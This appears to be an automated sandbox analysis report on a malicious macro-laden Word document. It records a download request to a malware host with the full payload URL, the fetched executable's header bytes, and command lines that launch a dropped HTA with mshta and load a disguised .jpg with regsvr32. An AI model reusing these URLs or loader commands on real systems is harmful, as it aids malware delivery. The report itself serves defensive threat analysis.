popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

details_010.21.doc

VBA_macro Malicious Library UPX Malicious Packer GIF Format Word 2007 file format(docx) PE64 PE File DLL
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 23, 2021, 10:21 a.m. Oct. 23, 2021, 10:23 a.m.
Size 34.5KB
Type Microsoft Word 2007+
MD5 aca3ce06cbd73347cfdc1019f37fa0b4
SHA256 27b8a197d7ae0f4538f79814ae2885e8b654a1633cc8caedf54f52aa931e0238
CRC32 99BAD101
ssdeep 768:FRmrqQthgRKjEHTY3vj02VWnZdw9822zGaOdAtDGUhy:HJQtpj0TgwcWwkTtaYy
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • docx - Word 2007 file format detection

Name Response Post-Analysis Lookup
burnsbuddyg.com
A 45.95.11.181
45.95.11.181
IP Address Status Action
164.124.101.2 Active Moloch
45.95.11.181 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 45.95.11.181:80 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.95.11.181:80 -> 192.168.56.103:49172 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 45.95.11.181:80 -> 192.168.56.103:49172 2014520 ET INFO EXE - Served Attached HTTP Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
DllRegisterServer+0xca95 @ 0x18001fed5
GetProcessHeap+0x20 BaseSetLastNTError-0x20 kernel32+0x23070 @ 0x76de3070
0x27d340

exception.instruction_r: 8a 01 84 c0 74 57 48 8d 71 01 31 ff 49 be 00 00
exception.instruction: mov al, byte ptr [rcx]
exception.exception_code: 0xc0000005
exception.symbol: DllRegisterServer+0xca95
exception.address: 0x18001fed5
registers.r14: 2607984
registers.r15: 1
registers.rcx: 0
registers.rsi: 2608000
registers.r10: 4294967295
registers.rbx: 0
registers.rsp: 2607920
registers.r11: 0
registers.r8: 2608000
registers.r9: 0
registers.rdx: 0
registers.r12: 2609824
registers.rbp: 2609984
registers.rdi: 0
registers.rax: 0
registers.r13: 2609840
1 0 0
request GET http://burnsbuddyg.com/cbfsd/BlDFRsj1bsGvKdLIj/98697/7309/33451/Pg9zYLcfzirZtPtx1Pn64fLoWAIDvNPx4lclw/LaQAZSeiLYPCjjCble334/QdHhD0r/98/RDvuSh/peju4?q=RYaTpLn2leLH6rxKG0pux1CME3RY&sid=UY8SVDRzRqZb&CWpJmycHi=iF0I26&sid=YGrkJjD4n&q=mbdtF5ziKWJczkstBlW0PBT7Ia&time=DEYO7nTt&q=EY7sl24iZtw7zTehznnCVwHt&q=G9FdCrnm6Z6yu
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa06000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9eb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9f7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9db000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9d6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa1b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9b7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9fb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa22000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa0b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa06000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9eb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9f7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9db000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9d6000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6aa1b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9b7000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a9fb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6a46e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c56000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c56000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c56000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c56000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c53000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c56000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c56000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c53000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02510000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02510000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02511000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02511000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02511000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02511000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02511000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02511000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02511000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02511000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04580000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x046a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02513000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2ad2000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff150000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa871000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3287000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff30d000
process_handle: 0xffffffffffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 0
root_path: C:\Users\test22\AppData\Local\Temp\Temporary Internet Files\Content.IE5
total_number_of_bytes: 0
0 0
file C:\Users\test22\AppData\Local\Temp\~$tails_010.21.doc
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\redLoveCaroline.hta.LNK
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000488
filepath: C:\Users\test22\AppData\Local\Temp\~$tails_010.21.doc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$tails_010.21.doc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0

NtCreateFile

 create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000618
filepath: c:\Users\Public\~$dLoveCaroline.hta
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\c:\users\public\~$dLoveCaroline.hta
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\redLoveCaroline.hta.LNK
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Public.LNK
cmdline "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\redLoveCaroline.hta"
cmdline regsvr32 c:\users\public\kingYouLove.jpg
cmdline "C:\Windows\System32\regsvr32.exe" c:\users\public\kingYouLove.jpg
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Sat, 23 Oct 2021 01:21:25 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34 X-Powered-By: PHP/7.2.34 Content-Description: File Transfer Content-Disposition: attachment; filename="peju5" Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 860289 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $×ênd“‹7“‹7“‹7´M{7Ž‹7“‹7ډ7Ùƒ7‹7Ù•7˜‹7´Mm7™‹7Ù„7/‹7Ù’7’‹7Ù”7’‹7Ù‘7’‹7Rich“‹7PEd†°µä`ð"  ×€À /@p@Sà,@ °0À xr€ ° ð .text(  `.rdataà  "@@.dataðbP
received: 1024
socket: 996
1 1024 0

InternetReadFile

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $×ênd“‹7“‹7“‹7´M{7Ž‹7“‹7ډ7Ùƒ7‹7Ù•7˜‹7´Mm7™‹7Ù„7/‹7Ù’7’‹7Ù”7’‹7Ù‘7’‹7Rich“‹7PEd†°µä`ð"  ×€À /@p@Sà,@ °0À xr€ ° ð .text(  `.rdataà  "@@.dataðbP
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x00000378
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
Elastic malicious (high confidence)
Cyren PP97M/Agent.ADW.gen!Eldorado
TrendMicro-HouseCall Possible_OLEGTAD
Kaspersky VHO:Trojan.MSOffice.SAgent.gen
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
TrendMicro Possible_OLEGTAD
McAfee-GW-Edition BehavesLike.Downloader.nc
SentinelOne Static AI - Malicious OPENXML
McAfee W97M/Downloader.dkf
Fortinet VBA/Agent.F251!tr.dldr
parent_process winword.exe martian_process "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\redLoveCaroline.hta"
parent_process winword.exe martian_process c:\Users\Public\redLoveCaroline.hta
file C:\Windows\SysWOW64\mshta.exe